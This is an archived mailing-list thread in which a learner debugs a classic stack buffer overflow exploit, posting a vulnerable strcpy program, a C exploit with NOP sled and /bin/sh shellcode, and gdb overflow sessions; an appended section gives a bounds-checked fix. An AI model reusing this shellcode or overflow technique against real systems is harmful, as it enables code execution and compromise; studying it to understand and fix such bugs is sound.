RE: stack overflow help ..
- From: gaurav saha <gauravsaha007@xxxxxxxxx>
- Date: Sun, 28 Jan 2007 03:43:44 -0800 (PST)
yes I read ..
if i write 4 more bytes .. it overwrites the *saved*
eip .. right ??
========= vul1.c ========
[root@winmitm ~]# more a1.c
f(char *str) {
    char a[1024];
    strcpy(a,str);
}
main(int argc,char *argv[1]) {
    if(argc>1) f(argv[1]);
}
====== end of code ===
my exploit code which i wrote for this was ..
===== exploit1.c ======
#include <stdio.h>
#include <string.h>

#define lv_size 1024
#define offset 30+lv_size+8*4

long get_sp()
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char buffer[lv_size+4*8];
    unsigned long *ptr2 = NULL;
    char *ptr = NULL;
    int i;

    printf("1..\n");
    // Filling with null
    for(i=0;i<lv_size+4*8;i++)
        buffer[i]=0x00;
    ptr=buffer;

    printf("2..\n");
    // Filling with NOPs
    for(i=0;i<lv_size-strlen(execshell);i++)
        *(ptr++)=0x90;

    printf("3..\n");
    // Filling with shellcode
    for(i=0;i<strlen(execshell);i++)
        *(ptr++)=execshell[i];

    printf("4..\n");
    // ptr2 pointing to ptr
    ptr2=(long *)ptr;

    printf("5..\n");
    // Filling with address
    for(i=1;i<2;i++)
        *(ptr2++)=get_sp()+offset;

    execl("/root/vul1", "vul1", buffer, NULL);
}
======== end of my exploit code =======
[root@winmitm ~]# cc expl1.c -o exploit
[root@winmitm ~]# ./exploit
1..
2..
3..
4..
5..
get_sp=bfffe568 and len=4
get_sp+offset=bfffe9a6 and len=4
6..
buffer:<�^^
3VV45V4N
�3��/bin/sh�>
[root@winmitm ~]#
this is what i get ... can you please guide me on what i
am doing wrong ??
thanks
----gaurav
--- "Krpata, Tyler" <tkrpata@xxxxxxx> wrote:
Do an "info frame" in gdb. Remember that you are trying, actually, to
overwrite the *saved* EIP value.
-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of gaurav saha
Sent: Thursday, January 25, 2007 6:27 PM
To: security-basics@xxxxxxxxxxxxxxxxx
Subject: stack overflow help ..
Hi,
i am new to this stack overflow issue.
i am using fc3 (kernel 2.6.12-1.1381)
i have modified these few sysctl keys to these values.
    kernel.overflowgid = 0
    kernel.overflowuid = 0
    fs.overflowgid = 0
    fs.overflowuid = 0
    kernel.randomize_va_space = 0
i am still unable to overwrite EIP
========= vuln1.c ===========
int main(int argc, char **argv)
{
    char buf[1024];
    strcpy(buf, argv[1]);
    return 0;
}
====== end of vuln1.c =======
$gcc -ggdb vuln1.c -o v1
$gdb ./v1
.
.
(gdb) run `perl -e 'print "A"x1024'`
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1024'`
Reading symbols from shared object read from memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xb5c000
(no debugging symbols found)...(no debugging symbols found)...
Program exited with code 0120.
(gdb) run `perl -e 'print "A"x1028'`
warning: cannot close "shared object read from memory": File in wrong format
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1028'`
Reading symbols from shared object read from memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x247000
(no debugging symbols found)...(no debugging symbols found)...
Program exited with code 0100.
(gdb) run `perl -e 'print "A"x1036'`
warning: cannot close "shared object read from memory": File in wrong format
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1036'`
Reading symbols from shared object read from memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x807000
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x00ac8e0d in __libc_start_main () from /lib/tls/libc.so.6
(gdb) info reg
.
.
ebx            0xbdaff4      12431348
esp            0xbffff350    0xbffff350
ebp            0x41414141    0x41414141
esi            0xbffff3d4    -1073744940
edi            0xbffff360    -1073745056
eip            0xac8e0d      0xac8e0d
eflags         0x210286      2163334
.
.
(gdb) run `perl -e 'print "A"x1040'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141    0x41414141
eip            0x80483a2     0x80483a2
(gdb) run `perl -e 'print "A"x1044'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141    0x41414141
eip            0x80483a2     0x80483a2
(gdb) run `perl -e 'print "A"x1048'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141    0x41414141
eip            0x80483a2     0x80483a2
(gdb) run `perl -e 'print "A"x1052'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141    0x41414141
eip            0x80483a2     0x80483a2
(gdb) run `perl -e 'print "A"x1056'`
Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141    0x41414141
eip            0x80483a2     0x80483a2
and this keeps continuing ... no matter how much i
increase ...
and i can't figure out what the problem is ...
thanks and adieu
----gaurav
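The whole thread turns on strcpy() copying argv[1] into a fixed 1024-byte stack array with no length check, which is what lets the saved EBP/EIP get overwritten. Below is an added example (mine, not code from the thread) of the bounds-checked replacement a defender would put in place of that strcpy(); copy_arg() and accepts_length() are my own names, and accepts_length() mirrors the thread's `perl -e 'print "A"x N` runs so the cut-off can be checked directly.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1024   /* same size as a[1024] / buf[1024] in the thread */

/* Bounds-checked replacement for strcpy(a, str). Returns 1 and copies str
 * (with its terminating NUL) into a when it fits; returns 0 and leaves a
 * as an empty string when str is BUF_SIZE bytes or longer, so nothing can
 * spill past the array into the saved EBP/EIP. */
int copy_arg(char a[BUF_SIZE], const char *str)
{
    /* Look for the NUL only inside the first BUF_SIZE bytes of str. */
    const char *end = memchr(str, '\0', BUF_SIZE);
    if (end == NULL) {          /* no NUL in range: input needs >= BUF_SIZE bytes */
        a[0] = '\0';
        return 0;
    }
    memcpy(a, str, (size_t)(end - str) + 1);  /* <= BUF_SIZE bytes incl. NUL */
    return 1;
}

/* Probe helper (constructed input): builds an argument of len 'A's, like the
 * thread's perl one-liners, and reports whether copy_arg() accepts it.
 * Returns 1 (accepted), 0 (rejected) or -1 on allocation failure. */
int accepts_length(size_t len)
{
    char a[BUF_SIZE];
    char *in = malloc(len + 1);
    if (in == NULL)
        return -1;
    memset(in, 'A', len);
    in[len] = '\0';
    int ok = copy_arg(a, in);
    free(in);
    return ok;
}

/* Same shape as the thread's main(): one argument, one stack buffer. */
int main(int argc, char *argv[])
{
    char a[BUF_SIZE];
    if (argc > 1) {
        if (!copy_arg(a, argv[1])) {
            fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
            return 1;
        }
        printf("copied %zu bytes\n", strlen(a));
    }
    return 0;
}
```

With this in place the 1036..1056-byte runs from the gdb session are rejected before any copy happens, while anything up to 1023 bytes is copied as before.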